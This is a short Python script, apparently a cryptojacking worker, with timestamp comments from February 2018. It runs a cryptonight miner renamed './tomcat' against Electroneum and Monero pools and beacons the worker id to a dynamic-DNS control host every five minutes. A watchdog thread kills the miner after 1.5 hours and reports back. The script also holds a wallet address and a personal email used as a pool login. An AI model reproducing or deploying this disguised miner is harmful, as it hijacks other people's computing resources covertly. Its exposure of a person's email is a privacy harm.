import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:05.054384
#2018-02-17 16:22:03.441858
#2018-02-17 18:09:07.443146
#2018-02-17 19:57:07.274636
#2018-02-17 21:45:06.824698
#2018-02-17 23:29:06.982370
#2018-02-18 01:19:06.484308
#2018-02-18 03:06:03.614610
#2018-02-18 04:54:04.338289
#2018-02-18 06:46:05.307897
#2018-02-18 08:34:01.620171
#2018-02-18 10:21:07.677846
#2018-02-18 12:07:05.319114
#2018-02-18 13:52:01.505580
#2018-02-18 15:42:06.040245
#2018-02-18 17:32:05.902527
#2018-02-18 19:19:07.261802
#2018-02-18 21:06:03.819246
#2018-02-18 22:53:06.193363
#2018-02-19 00:42:05.018828
#2018-02-19 02:28:01.523340
#2018-02-19 04:14:07.648951
#2018-02-19 05:59:01.320102
#2018-02-19 07:47:06.373179
#2018-02-19 09:37:03.707818
#2018-02-19 11:26:06.662061
#2018-02-19 13:13:06.835920
#2018-02-19 15:03:02.016618
#2018-02-19 16:50:09.514894
#2018-02-19 18:38:07.248451
#2018-02-19 20:23:07.691576
#2018-02-19 22:11:06.221106
#2018-02-19 23:58:07.494100
#2018-02-20 01:44:07.680054
#2018-02-20 03:33:01.460955
#2018-02-20 05:20:06.958807
#2018-02-20 07:03:06.432409
#2018-02-20 08:50:08.505166
#2018-02-20 10:34:04.624251
#2018-02-20 12:19:04.754601
#2018-02-20 14:06:04.228487
#2018-02-20 15:48:11.644592
#2018-02-20 17:35:01.908951
#2018-02-20 19:23:08.808585
#2018-02-20 21:13:05.138939
#2018-02-20 22:59:04.651307
#2018-02-21 00:43:01.502388
#2018-02-21 02:29:05.403778
#2018-02-21 04:16:07.738259
#2018-02-21 06:03:07.271835
#2018-02-21 07:50:01.365476
#2018-02-21 09:34:03.561127
#2018-02-21 11:22:08.365062
#2018-02-21 13:12:12.955825
#2018-02-21 14:58:06.039797
#2018-02-21 16:46:03.663057
#2018-02-21 18:35:09.308238
#2018-02-21 20:21:07.181336
#2018-02-21 22:11:04.295274
#2018-02-22 00:01:01.640774
#2018-02-22 01:49:02.104392
#2018-02-22 03:36:06.818729
#2018-02-22 05:23:05.791908
#2018-02-22 07:07:02.013256
#2018-02-22 08:53:06.814670
#2018-02-22 10:40:10.776688
#2018-02-22 12:28:01.536527
#2018-02-22 14:14:04.666163
#2018-02-22 16:03:11.228662
#2018-02-22 17:49:04.635785
#2018-02-22 19:37:07.914247
#2018-02-22 21:28:08.310666
#2018-02-22 23:16:04.464150
#2018-02-23 01:02:01.363615
#2018-02-23 02:50:07.175613
#2018-02-23 04:38:05.125834
#2018-02-23 06:24:02.022533
#2018-02-23 08:10:06.127102
#2018-02-23 10:28:01.254122
#2018-02-23 12:21:02.002634
#2018-02-23 14:09:09.027561
#2018-02-23 15:59:04.229979
#2018-02-23 17:44:08.986809
#2018-02-23 19:32:05.901547
#2018-02-23 21:15:08.215491
#2018-02-23 23:03:08.921364
#2018-02-24 00:49:01.865247
#2018-02-24 02:42:01.497497
#2018-02-24 05:29:07.386045
#2018-02-24 07:16:06.375784
#2018-02-24 09:05:01.750588
#2018-02-24 10:42:03.608512
#2018-02-24 12:32:05.182384
#2018-02-24 14:21:06.603265
#2018-02-24 16:11:04.769087
#2018-02-24 18:03:01.513948
#2018-02-24 19:50:03.783816
#2018-02-24 21:34:04.067135
#2018-02-25 02:03:01.633345
#2018-02-25 05:59:01.577059
#2018-02-25 11:39:05.703982